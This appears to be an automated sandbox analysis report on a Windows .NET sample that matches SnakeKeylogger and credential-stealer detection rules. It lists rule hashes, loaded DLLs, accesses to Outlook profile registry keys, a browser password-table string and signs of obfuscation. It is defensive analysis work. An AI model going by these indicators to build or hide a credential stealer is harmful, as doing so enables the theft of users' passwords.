                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Process Stats: CPU usage > 49%
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1248774151.000000000276F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1246312545.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000000.1234820976.0000000000262000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameGpGI.exeD vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1255991907.0000000006D10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000003.00000002.3698209610.00000000011A7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe | Binary or memory string: OriginalFilenameGpGI.exeD vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: kP8EgMorTr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rgGUGalHrgysDRf4jP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rgGUGalHrgysDRf4jP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.cs | Security API names: _0020.AddAccessRule
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kP8EgMorTr.exe.log
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Mutant created: NULL
                    Source: kP8EgMorTr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003555000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003599000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003565000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000035A5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: kP8EgMorTr.exe | Virustotal: Detection: 36%
                    Source: kP8EgMorTr.exe | ReversingLabs: Detection: 39%
                    Source: unknown | Process created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Process created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: iconcodecservice.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: kP8EgMorTr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: kP8EgMorTr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs | .Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs | .Net Code: Wd1uQNpiCD System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.cs | .Net Code: Wd1uQNpiCD System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 0_2_06D0B5B4 pushad ; retn 0503h | 0_2_06D0DFE1
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 0_2_06D0F2D2 pushad ; iretd | 0_2_06D0F2D9
                    Source: kP8EgMorTr.exe | Static PE information: section name: .text entropy: 7.7229254201155815
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs | High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, vH9V9oD7tIKkmfHnnj.cs | High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, BPHUtOLnNX1TNBBy6C.cs | High entropy of concatenated method names: 'K3fQgYY8j', 'ka0FMlhl4', 'jw2m99MGI', 'YO4aG1Suw', 'jxGOmMfj2', 'okei3u5IY', 'vamraAks3bJmkhrIoX', 'iIuV2FGe1s46oAihWj', 'R0nNM1hYE', 'pZpMOjvJX'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, jpTyGdIfYXfOSJg7u7.cs | High entropy of concatenated method names: 'J9FdC3ccIy', 'S7cdtaOdVM', 'ToString', 'wjtdW741PL', 'iMrd2RZGOI', 'hePd66akyl', 'DAhdTETKen', 'aZUd1REflp', 'G7Wd8Vh2Ke', 'KuodVBpFDr'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, ii9TbpDwVj4VyHwdew.cs | High entropy of concatenated method names: 'YvG802s7pe', 'Ajh87A2sQ5', 'VHy8QAPtTK', 'fjN8FNqGsn', 'gm18YUHuvA', 'scJ8mO97mK', 'Fy78aXOmXF', 'u9e8lgk9Zb', 'DFV8OtmrdG', 'lOA8iR08I3'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, wLVJRn6LhWfanhDX6u.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uVGL3CVPcA', 'G8oLHsgqkH', 'HHvLzqinAA', 'eu2j4ZQ87x', 'L39jX5PeV8', 'XwnjLg1WtQ', 'IwHjjpN2iK', 'vZW3nTUuGN6F56Om4VE'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, PtJ2xmuqlD57FvXoff.cs | High entropy of concatenated method names: 'WJrX8gGUGa', 'YrgXVysDRf', 'GlgXCHMK4Z', 'eUFXt29ZxW', 'yHxXJfAJTV', 'jSOXAp6Grb', 'JJJnTwNVccM2G3YD0v', 'SeVrsjMZYAntyrPp5J', 'd85XXntW0X', 'AnLXjEmKvO'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, uJbwwqXuvhrFBcdg5rt.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UG4vrFVMeG', 'WRtvMiOeek', 'bG0voXTM6R', 'Aa5vvXdl3k', 'GYGvx0NZH8', 'zsrvex5JMs', 'yUHvsiaeUR'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, z2sVuFHhwOxq1ZhDsE.cs | High entropy of concatenated method names: 't9IM6bHCrP', 'gR7MTj4531', 'wXbM178TuF', 'H2CM8XI3TW', 'jxYMr1s8Tk', 'Ku2MVrGqUW', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, iDfM96fsdG8TI2V6rF.cs | High entropy of concatenated method names: 'ffQ8WFaqm3', 'jNF86u9Go3', 'cgH81TldHg', 'FaU1HYLEot', 'IFG1zresYV', 'RJi84d13kD', 'VSM8XjJsCp', 'sxT8LSjsIP', 'qEB8j8pGen', 'lbA8u4BNoI'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, mZrpi6z1Nfud5h9Fj2.cs | High entropy of concatenated method names: 'eUmMm4XOgM', 'jQ4Ml6MCnm', 'XfTMOEcQcc', 'T5sMKYj0ut', 'rs2MUZpOJe', 'oMFMZZ2D6t', 'fBwMPqixjh', 'iqbMsgHB3s', 'SXUM0vTCRQ', 'YvrM7LQZQs'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, q8O9oWg702N00qHtOJ.cs | High entropy of concatenated method names: 'Tj5rJA978L', 'DnQrd1S7lx', 'OhurrZAXfG', 'HOProU9x3i', 'LckrxMCvTi', 'jdBrsagEv1', 'Dispose', 'xylNWTUBi2', 'oInN2bUb48', 'cgkN6sCJv4'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, YIEg1T2LbG8rASQpNY.cs | High entropy of concatenated method names: 'Dispose', 'gN0X30qHtO', 'QjsLUMAG3B', 'VhuRWskjWd', 'oY4XHd4weK', 'Hw7XzY7Xfe', 'ProcessDialogKey', 'eYOL4h8slI', 'eIOLXYe0xE', 'eomLL72sVu'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, J8fA5lqdJSJ8cqu8Vd.cs | High entropy of concatenated method names: 'ToString', 'EEOAbrY5LP', 'dDWAUcO1Aw', 'vcjAyoFttX', 'PwtAZxuE4r', 'LoSAPC6GId', 'ziWA9VcEpb', 'dJRAfaNP9J', 'a1IAn7knBs', 'rbbADTS7r6'
